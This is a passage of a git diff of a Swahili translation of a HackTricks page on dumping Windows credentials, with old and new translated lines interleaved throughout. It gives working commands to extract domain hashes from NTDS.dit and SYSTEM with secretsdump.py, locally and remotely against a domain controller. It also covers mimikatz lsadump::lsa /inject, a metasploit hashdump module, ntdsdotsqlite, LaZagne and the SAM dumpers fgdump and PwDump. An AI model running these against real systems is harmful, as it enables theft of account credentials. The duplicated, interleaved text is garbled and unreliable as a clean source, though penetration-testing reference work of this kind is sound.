Unaweza pia kutumia mbinu ya [**kivuli cha nakala ya diski**](./#stealing-sam-and-system) kuiga faili ya **ntds.dit**. Kumbuka kuwa pia utahitaji nakala ya faili ya **SYSTEM** (tena, [**ichote kutoka kwenye usajili au tumia mbinu ya kivuli cha nakala ya diski**](./#stealing-sam-and-system)).
|
||||
Unaweza pia kutumia mbinu ya [**volume shadow copy**](./#stealing-sam-and-system) kunakili faili la **ntds.dit**. Kumbuka kuwa utahitaji pia nakala ya **SYSTEM file** (tena, [**itoa kutoka kwenye registry au tumia mbinu ya volume shadow copy**](./#stealing-sam-and-system)).
|
||||
|
||||
### **Kuchambua hash kutoka NTDS.dit**
|
||||
### **Kutoa hashes kutoka NTDS.dit**
|
||||
|
||||
Baada ya kupata faili za **NTDS.dit** na **SYSTEM** unaweza kutumia zana kama _secretsdump.py_ ku **chambua hash**:
|
||||
Baada ya kupata faili za **NTDS.dit** na **SYSTEM** unaweza kutumia zana kama _secretsdump.py_ **kutoa hashes**:
|
||||
```bash
|
||||
secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
|
||||
```
|
||||
Unaweza pia **kuzitoa kiotomatiki** kwa kutumia mtumiaji halali wa admin wa kikoa:
|
||||
Unaweza pia **kuzitoa kiotomatiki** ukitumia mtumiaji halali wa admin wa domain:
|
||||
```
|
||||
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
|
||||
```
|
||||
Kwa **faili kubwa za NTDS.dit**, inapendekezwa kuzitoa kwa kutumia [gosecretsdump](https://github.com/c-sto/gosecretsdump).
|
||||
Kwa **mafaili makubwa ya NTDS.dit** inashauriwa kuyatoa kwa kutumia [gosecretsdump](https://github.com/c-sto/gosecretsdump).
|
||||
|
||||
Mwishowe, unaweza pia kutumia moduli ya **metasploit**: _post/windows/gather/credentials/domain\_hashdump_ au **mimikatz** `lsadump::lsa /inject`
|
||||
Hatimaye, unaweza pia kutumia **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ au **mimikatz** `lsadump::lsa /inject`
|
||||
|
||||
### **Kuchimbua vitu vya kikoa kutoka NTDS.dit hadi kwenye database ya SQLite**
|
||||
### **Kutoa vitu vya domain kutoka NTDS.dit hadi kwenye hifadhidata ya SQLite**
|
||||
|
||||
Vitu vya NTDS vinaweza kuchimbwa kwenye database ya SQLite na [ntdsdotsqlite](https://github.com/almandin/ntdsdotsqlite). Sio tu siri zinazochimbwa lakini pia vitu vyote na sifa zao kwa ajili ya uchimbaji wa habari zaidi wakati faili ya NTDS.dit ya awali imepatikana.
|
||||
Vitu vya NTDS vinaweza kutolewa hadi kwenye hifadhidata ya SQLite kwa kutumia [ntdsdotsqlite](https://github.com/almandin/ntdsdotsqlite). Sio siri tu zinazotolewa bali pia vitu vyote na sifa zao kwa uchimbaji wa taarifa zaidi wakati faili ghafi la NTDS.dit tayari limepatikana.
|
||||
```
|
||||
ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
|
||||
```
|
||||
`SYSTEM` hive ni hiari lakini inaruhusu kufichua siri (NT & LM hashes, nywila za wazi, kerberos au trust keys, NT & LM password histories). Pamoja na habari nyingine, data ifuatayo inachimbwa: akaunti za mtumiaji na mashine pamoja na hashes zao, alama za UAC, muda wa kuingia mwisho na mabadiliko ya nywila, maelezo ya akaunti, majina, UPN, SPN, vikundi na uanachama wa kurekursi, muundo wa vitengo vya shirika na uanachama, domain za kuaminika na aina za uaminifu, mwelekeo na sifa...
|
||||
`SYSTEM` hive ni hiari lakini inaruhusu usimbuaji wa siri (NT & LM hashes, nywila za wazi, funguo za kerberos au za uaminifu, historia za nywila za NT & LM). Pamoja na taarifa nyingine, data ifuatayo inatolewa: akaunti za mtumiaji na mashine na hashes zao, bendera za UAC, muda wa mwisho wa kuingia na kubadilisha nywila, maelezo ya akaunti, majina, UPN, SPN, vikundi na uanachama wa kurudia, mti wa vitengo vya shirika na uanachama, maeneo yanayoaminika na aina za uaminifu, mwelekeo na sifa...
|
||||
|
||||
## Lazagne
|
||||
|
||||
Pakua faili ya binary kutoka [hapa](https://github.com/AlessandroZ/LaZagne/releases). Unaweza kutumia faili hii ya binary kuchimbua siri kutoka programu mbalimbali.
|
||||
Pakua binary kutoka [hapa](https://github.com/AlessandroZ/LaZagne/releases). unaweza kutumia binary hii kutoa nywila kutoka kwa programu kadhaa.
|
||||
```
|
||||
lazagne.exe all
|
||||
```
|
||||
## Zana nyingine za kuchukua siri kutoka kwa SAM na LSASS
|
||||
## Zana zingine za kutoa hati kutoka SAM na LSASS
|
||||
|
||||
### Windows credentials Editor (WCE)
|
||||
|
||||
Zana hii inaweza kutumika kuchukua siri kutoka kwa kumbukumbu. Pakua kutoka: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
|
||||
Chombo hiki kinaweza kutumika kutoa hati kutoka kwenye kumbukumbu. Pakua kutoka: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
|
||||
|
||||
### fgdump
|
||||
|
||||
Chukua siri kutoka kwa faili ya SAM
|
||||
Toa hati kutoka kwenye faili la SAM
|
||||
```
|
||||
You can find this binary inside Kali, just do: locate fgdump.exe
|
||||
fgdump.exe
|
||||
```
|
||||
### PwDump
|
||||
|
||||
Chukua siri za kuingia kutoka kwenye faili ya SAM
|
||||
Kutoa hati kutoka kwenye faili la SAM
|
||||
```
|
||||
You can find this binary inside Kali, just do: locate pwdump.exe
|
||||
PwDump.exe -o outpwdump -x 127.0.0.1
|
||||
|
|
@ -347,22 +356,22 @@ type outpwdump
|
|||
```
|
||||
### PwDump7
|
||||
|
||||
Pakua kutoka: [http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) na tu **itekeleze** na nywila zitachimbuliwa.
|
||||
Pakua kutoka: [http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) na **itekeleze** tu na nywila zitachukuliwa.
|
||||
|
||||
## Ulinzi
|
||||
|
||||
[Jifunze kuhusu baadhi ya ulinzi wa vitambulisho hapa.](credentials-protections.md)
|
||||
[**Jifunze kuhusu baadhi ya ulinzi wa nywila hapa.**](credentials-protections.md)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za hacking kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
|||
Loading…
Reference in a new issue